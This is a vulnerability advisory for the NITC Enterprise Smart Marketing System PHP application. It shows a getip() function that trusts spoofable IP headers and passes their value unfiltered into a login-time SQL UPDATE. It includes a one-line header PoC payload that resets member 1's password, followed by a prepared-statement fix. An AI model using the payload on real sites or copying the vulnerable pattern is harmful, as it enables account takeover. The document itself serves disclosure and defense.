NITC Enterprise Smart Marketing System
```php
// Vulnerable getip() as shipped: it trusts client-controlled request headers
// (X-Forwarded-For, Client-IP) and returns their raw value without validation.
function getip()
{
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            // Attacker-controlled header returned verbatim
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
            return $realip;
        }
        if (isset($_SERVER['HTTP_CLIENT_IP'])) {
            // Attacker-controlled header returned verbatim
            $realip = $_SERVER['HTTP_CLIENT_IP'];
            return $realip;
        }
        // Only this value comes from the TCP connection itself
        $realip = $_SERVER['REMOTE_ADDR'];
        return $realip;
    }
    // Same logic via getenv() when $_SERVER is unavailable
    if (getenv("HTTP_X_FORWARDED_FOR")) {
        $realip = getenv("HTTP_X_FORWARDED_FOR");
        return $realip;
    }
    if (getenv("HTTP_CLIENT_IP")) {
        $realip = getenv("HTTP_CLIENT_IP");
        return $realip;
    }
    $realip = getenv("REMOTE_ADDR");
    return $realip;
}
```
The IP retrieval performs no filtering, which leads to SQL injection in multiple places on the site.
```php
if ($action == "login") {
    ....
    // $ip holds the unvalidated header value from getip()
    $ip = getip();
    $_SESSION['member_email'] = $email;
    $_SESSION['member_id']    = $result['member_id'];
    $_SESSION['state']        = $result['state'];
    $_SESSION['member_name']  = $result['name'];
    // $ip is concatenated straight into the UPDATE statement
    $site->table("member")("update " . $site->table("member") . " set last_ip='" . $ip . "',last_time='" . date("Y-m-d H:i:s", time()) . "' where member_id=" . $result['member_id']);
}
```
Here, when a user logs in, the login IP is recorded. Because this is an UPDATE of the member record, SQL injection can be used directly to update any user's password.
PoC: add the following request header: client-ip:',password='' where member_id=1#
Solution:
Filter and validate the value returned by getip() before using it in SQL.
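As an added example (not NITC's code), one way to apply that fix: a getip() that only honours forwarding headers from a known proxy and validates the result as an IP address, plus the login-time update rewritten as a prepared statement. It assumes a PDO connection `$pdo`, a hypothetical `TRUSTED_PROXIES` list, and that the table is named `member`.

```php
<?php
// Added example, not the vendor's code. Assumes $pdo is a PDO connection and
// that TRUSTED_PROXIES (hypothetical) lists the reverse proxies allowed to
// set X-Forwarded-For. The proxy address below is a constructed sample value.
const TRUSTED_PROXIES = ['10.0.0.5'];

function getip(): string
{
    $remote = $_SERVER['REMOTE_ADDR'] ?? '';

    // Honour X-Forwarded-For only when the TCP peer is a proxy we control;
    // otherwise any client can place arbitrary text in that header.
    if (in_array($remote, TRUSTED_PROXIES, true) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // The header is "client, proxy1, proxy2"; the first hop is the client.
        $candidate = trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }

    // Fall back to the socket address, which cannot be spoofed via headers.
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

function record_login(PDO $pdo, int $memberId): void
{
    // A prepared statement keeps the IP out of the SQL text entirely, so even
    // an unexpected value can no longer alter the SET or WHERE clauses.
    $stmt = $pdo->prepare(
        'UPDATE member SET last_ip = :ip, last_time = :t WHERE member_id = :id'
    );
    $stmt->execute([
        ':ip' => getip(),
        ':t'  => date('Y-m-d H:i:s'),
        ':id' => $memberId,
    ]);
}
```

With this in place, the header value from the PoC above fails FILTER_VALIDATE_IP and is never sent to the database, and the bound parameter would treat it as plain data even if it were.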